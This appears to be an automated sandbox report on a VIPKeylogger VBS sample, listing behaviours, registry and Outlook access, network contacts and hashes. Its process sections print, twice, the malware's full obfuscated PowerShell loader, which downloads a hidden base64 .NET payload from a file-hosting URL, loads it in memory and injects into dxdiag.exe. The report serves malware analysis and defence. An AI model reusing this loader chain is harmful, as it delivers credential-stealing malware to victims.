Analysis Overview
SHA256
2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6
Threat Level: Known bad
The file dfcugh.vbs was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Suspicious use of SetThreadContext
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
outlook_win_path
Modifies registry class
outlook_office_path
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 15:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 15:52
Reported
2024-11-07 15:55
Platform
win7-20241010-en
Max time kernel
14s
Max time network
18s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAHAAcwBoAG8AbQBlAFsANABdACsAJABwAHMAaABPAE0ARQBbADMANABdACsAJwB4ACcAKQAoACAAKAAnAEwAeABGAGkAbQBhAGcAJwArACcAZQBVAHIAbAAgAD0AIABEAFgAdgBoAHQAdABwACcAKwAnAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAJwArACcAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAcwBkADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAJwArACcAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEAJwArACcANAAnACsAJwBiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAARABYAHYAOwBMAHgARgB3AGUAYgAnACsAJwBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATAB4AEYAaQBtAGEAZwBlAEIAJwArACcAeQB0AGUAcwAgAD0AIABMAHgARgB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgATAB4AEYAaQBtAGEAZwBlAFUAcgBsACkAOwAnACsAJwBMACcAKwAnAHgARgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjACcAKwAnAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQAnACsAJwBuAGcAKABMAHgARgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBMAHgARgBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEQAWAB2ADsATAB4AEYAZQAnACsAJwBuAGQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBFACcAKwAnAE4ARAA+AD4ARABYAHYAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEwAeAAnACsAJwBGAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEwAeABGAHMAdABhAHIAdABGAGwAYQBnACkAOwBMAHgARgBlAG4AZABJAG4AZABlAHgAIAA9ACAATAB4AEYAaQBtAGEAJwArACcAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATAB4AEYAZQBuAGQARgBsAGEAZwApADsATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABMAHgARgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEwAeABGAHMAdABhAHIAdABJAG4AZABlAHgAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJwArACcATAB4AEYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEwAeABGAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAEwAeABGAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ADsATAB4AEYAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABMAHgARgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAATAB4AEYAYgBhAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AEwAeABGAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAOABiAEMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATAB4AEYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApACcAKwAnAF0AOwBMAHgARgBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgATAB4AEYAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAJwArACcAOwBMAHgARgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEwAeABGAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBMAHgARgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAnACsAJwAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgARABYAHYAVgBBAEkARABYAHYAKQA7AEwAeABGAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABMAHgARgBuAHUAbABsACwAIABAACgARAAnACsAJwBYAHYAdAB4AHQALgBkAHMAdABlAHAALwBwAG8AcAAvAHUAZQAuAHAAcgBnAHgAYQBtAHkAZwByAGUAbgBlAC4AZwBpAGcALwAvADoAcAB0AHQAaABEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAMQBEAFgAdgAsACAARABYAHYAZAB4AGQAaQBhAGcARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwAIABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsAEQAWAB2AGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAMQBEAFgAdgAsAEQAWAB2AGQAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYAKQApADsAJwApAC4AcgBlAFAAbABBAEMARQAoACcAOABiAEMAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBlAFAAbABBAEMARQAoACcATAB4AEYAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAzADYAKQAuAHIAZQBQAGwAQQBDAEUAKAAnAEQAWAB2ACcALABbAHMAdABSAEkATgBHAF0AWwBDAEgAYQBSAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 104.21.84.67:80 | paste.ee | tcp |
| US | 104.21.84.67:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js
| MD5 | 3d68e0db63d092d83baf5f2e61a2240c |
| SHA1 | 54bec790443c5eceea3819b516714d8d73588684 |
| SHA256 | 718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a |
| SHA512 | 115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf |
memory/2952-8-0x000000001B270000-0x000000001B552000-memory.dmp
memory/2952-9-0x0000000002490000-0x0000000002498000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 279251588d1506453bc89a67fa008a29 |
| SHA1 | ea79e3bbb3a8cf2f0f9982c93e8ed75eafa95c9b |
| SHA256 | 998d87d34c57c22aa5f8995138b5230bfad2ff58eaebc1c96e4c930bbac61644 |
| SHA512 | 342f3bfdfb3fe94d29f8232f9de9f832a4df547e78dd341209f001a7dd25d322ce4ac1600ab738cfe62c3a086a413e7e0b8b2ec19ca5a8a23f6853abdca2de0a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 15:52
Reported
2024-11-07 15:55
Platform
win10v2004-20241007-en
Max time kernel
114s
Max time network
149s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\dxdiag.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\dxdiag.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\dxdiag.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 740 set thread context of 2676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\dxdiag.exe |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dxdiag.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dxdiag.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dxdiag.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dxdiag.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\dxdiag.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\dxdiag.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAHAAcwBoAG8AbQBlAFsANABdACsAJABwAHMAaABPAE0ARQBbADMANABdACsAJwB4ACcAKQAoACAAKAAnAEwAeABGAGkAbQBhAGcAJwArACcAZQBVAHIAbAAgAD0AIABEAFgAdgBoAHQAdABwACcAKwAnAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAJwArACcAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAcwBkADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAJwArACcAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEAJwArACcANAAnACsAJwBiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAARABYAHYAOwBMAHgARgB3AGUAYgAnACsAJwBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATAB4AEYAaQBtAGEAZwBlAEIAJwArACcAeQB0AGUAcwAgAD0AIABMAHgARgB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgATAB4AEYAaQBtAGEAZwBlAFUAcgBsACkAOwAnACsAJwBMACcAKwAnAHgARgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjACcAKwAnAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQAnACsAJwBuAGcAKABMAHgARgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBMAHgARgBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEQAWAB2ADsATAB4AEYAZQAnACsAJwBuAGQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBFACcAKwAnAE4ARAA+AD4ARABYAHYAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEwAeAAnACsAJwBGAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEwAeABGAHMAdABhAHIAdABGAGwAYQBnACkAOwBMAHgARgBlAG4AZABJAG4AZABlAHgAIAA9ACAATAB4AEYAaQBtAGEAJwArACcAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATAB4AEYAZQBuAGQARgBsAGEAZwApADsATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABMAHgARgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEwAeABGAHMAdABhAHIAdABJAG4AZABlAHgAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJwArACcATAB4AEYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEwAeABGAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAEwAeABGAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ADsATAB4AEYAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABMAHgARgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAATAB4AEYAYgBhAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AEwAeABGAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAOABiAEMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATAB4AEYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApACcAKwAnAF0AOwBMAHgARgBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgATAB4AEYAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAJwArACcAOwBMAHgARgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEwAeABGAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBMAHgARgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAnACsAJwAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgARABYAHYAVgBBAEkARABYAHYAKQA7AEwAeABGAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABMAHgARgBuAHUAbABsACwAIABAACgARAAnACsAJwBYAHYAdAB4AHQALgBkAHMAdABlAHAALwBwAG8AcAAvAHUAZQAuAHAAcgBnAHgAYQBtAHkAZwByAGUAbgBlAC4AZwBpAGcALwAvADoAcAB0AHQAaABEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAMQBEAFgAdgAsACAARABYAHYAZAB4AGQAaQBhAGcARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwAIABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsAEQAWAB2AGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAMQBEAFgAdgAsAEQAWAB2AGQAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYAKQApADsAJwApAC4AcgBlAFAAbABBAEMARQAoACcAOABiAEMAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBlAFAAbABBAEMARQAoACcATAB4AEYAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAzADYAKQAuAHIAZQBQAGwAQQBDAEUAKAAnAEQAWAB2ACcALABbAHMAdABSAEkATgBHAF0AWwBDAEgAYQBSAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"
C:\Windows\SysWOW64\dxdiag.exe
